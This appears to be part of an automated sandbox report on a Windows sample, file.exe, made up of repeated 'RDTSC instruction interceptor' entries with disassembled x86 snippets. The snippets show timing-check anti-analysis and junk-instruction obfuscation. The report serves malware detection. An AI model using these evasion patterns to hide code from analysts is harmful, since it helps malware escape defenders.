                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EC4 second address: 12C9EDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EDA second address: 12C9EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8ED0E3C3D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9F91 second address: 12C9FAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CBF3A second address: 12CBF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDFB8 second address: 12CDFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDFBC second address: 12CDFD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDFD2 second address: 12CDFE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8ED0C920CEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D07BE second address: 12D07DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F8ED0E3C3DEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0DC7 second address: 12D0E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnl 00007F8ED0C920CCh 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007F8ED0C920D9h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 pop edi 0x00000018 nop 0x00000019 mov edi, 40D286AEh 0x0000001e push 00000000h 0x00000020 cld 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F8ED0C920C8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Dh 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D1A80h], esi 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 push esi 0x00000047 pop esi 0x00000048 push esi 0x00000049 pop esi 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F8ED0C920CCh 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1D55 second address: 12D1D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movzx edi, cx 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D264Eh], esi 0x00000017 push 00000000h 0x00000019 jmp 00007F8ED0E3C3E7h 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop ecx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1D9E second address: 12D1DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1DA4 second address: 12D1DB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jl 00007F8ED0E3C3D6h 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB111 second address: 12CB116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB116 second address: 12CB11C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC053 second address: 12CC059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC059 second address: 12CC05E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC05E second address: 12CC07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920D1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC07C second address: 12CC080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC080 second address: 12CC132 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F8ED0C920C8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 jg 00007F8ED0C920CCh 0x0000002c push dword ptr fs:[00000000h] 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F8ED0C920C8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d add ebx, dword ptr [ebp+122D348Bh] 0x00000053 mov dword ptr fs:[00000000h], esp 0x0000005a pushad 0x0000005b jmp 00007F8ED0C920D0h 0x00000060 mov cx, si 0x00000063 popad 0x00000064 mov eax, dword ptr [ebp+122D0191h] 0x0000006a jp 00007F8ED0C920CCh 0x00000070 mov ebx, dword ptr [ebp+122D1BF3h] 0x00000076 push FFFFFFFFh 0x00000078 mov ebx, dword ptr [ebp+122D1816h] 0x0000007e nop 0x0000007f jnp 00007F8ED0C920CEh 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 push edi 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC132 second address: 12CC137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC137 second address: 12CC13D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2F4D second address: 12D2F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE759 second address: 12CE75F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE75F second address: 12CE763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA1C8 second address: 12CA1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D200F second address: 12D2015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2015 second address: 12D2026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D407E second address: 12D4084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D7997 second address: 12D79B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F8ED0C920D3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D79B8 second address: 12D79BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D79BC second address: 12D79C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E6DC second address: 126E6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0E3C3E8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E6F8 second address: 126E73A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F8ED0C920CBh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F8ED0C920C6h 0x0000001e jmp 00007F8ED0C920D3h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E73A second address: 126E749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F8ED0E3C3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B096 second address: 126B0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920CCh 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b jbe 00007F8ED0C920E5h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8ED0C920D3h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD1B7 second address: 12DD1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F8ED0E3C3D8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8ED0E3C3DFh 0x00000017 pop edi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD5AB second address: 12DD5BE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007F8ED0C920C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3EF9 second address: 12E3F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3FEE second address: 12E3FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4097 second address: 12E409B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E56CD second address: 12E56D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E56D3 second address: 12E56ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB2EE second address: 12EB305 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8ED0C920D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB5A1 second address: 12EB5BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3DCh 0x00000007 js 00007F8ED0E3C3D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB802 second address: 12EB806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EF1B0 second address: 12EF1BA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8ED0E3C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F650B second address: 12F652E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8ED0C920CEh 0x00000009 jmp 00007F8ED0C920D1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F652E second address: 12F6532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6532 second address: 12F657C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0C920D2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F8ED0C920D1h 0x00000014 pushad 0x00000015 popad 0x00000016 jno 00007F8ED0C920C6h 0x0000001c popad 0x0000001d pushad 0x0000001e jg 00007F8ED0C920C6h 0x00000024 push edi 0x00000025 pop edi 0x00000026 jnp 00007F8ED0C920C6h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5159 second address: 12F517B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8ED0E3C3E2h 0x0000000d jl 00007F8ED0E3C3E2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F517B second address: 12F5181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58B8 second address: 12F58BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58BE second address: 12F58C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58C4 second address: 12F58C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58C8 second address: 12F58DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58DF second address: 12F58FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8ED0E3C3E0h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5C2C second address: 12F5C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5C30 second address: 12F5C3D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0E3C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5C3D second address: 12F5C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5C44 second address: 12F5C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F8ED0E3C3E5h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5F45 second address: 12F5F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jmp 00007F8ED0C920CDh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F8ED0C920C6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE800 second address: 12BE809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE809 second address: 12BE84D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F8ED0C920D1h 0x00000010 nop 0x00000011 mov ecx, dword ptr [ebp+122D3747h] 0x00000017 lea eax, dword ptr [ebp+12494569h] 0x0000001d mov di, 2F53h 0x00000021 nop 0x00000022 jng 00007F8ED0C920DEh 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE84D second address: 1297E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0E3C3E0h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8ED0E3C3DCh 0x00000014 popad 0x00000015 jp 00007F8ED0E3C3D8h 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e nop 0x0000001f mov edx, esi 0x00000021 push ecx 0x00000022 pushad 0x00000023 mov ah, bh 0x00000025 cld 0x00000026 popad 0x00000027 pop edi 0x00000028 call dword ptr [ebp+122D2793h] 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 pushad 0x00000033 popad 0x00000034 jbe 00007F8ED0E3C3D6h 0x0000003a jbe 00007F8ED0E3C3D6h 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 pop eax 0x00000045 jmp 00007F8ED0E3C3DEh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE943 second address: 12BE954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEF90 second address: 12BEF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEF94 second address: 12BEFA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF08D second address: 12BF09E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F8ED0E3C3D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF09E second address: 12BF0AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F8ED0C920C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0AC second address: 12BF0BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0BC second address: 12BF0C9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF71B second address: 12BF71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF71F second address: 12BF73A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF73A second address: 12BF73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF73E second address: 12BF775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov cx, DA5Ah 0x0000000f push 0000001Eh 0x00000011 jo 00007F8ED0C920CCh 0x00000017 mov dword ptr [ebp+122D1D59h], edx 0x0000001d nop 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFB1F second address: 12BFB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFB23 second address: 12BFB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12989EA second address: 12989F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12989F0 second address: 12989F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA5A2 second address: 12FA5A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA723 second address: 12FA749 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8ED0C920C6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8ED0C920D5h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA749 second address: 12FA74F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA74F second address: 12FA76D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA76D second address: 12FA773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA8CE second address: 12FA8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA8D9 second address: 12FA8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAA3D second address: 12FAA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
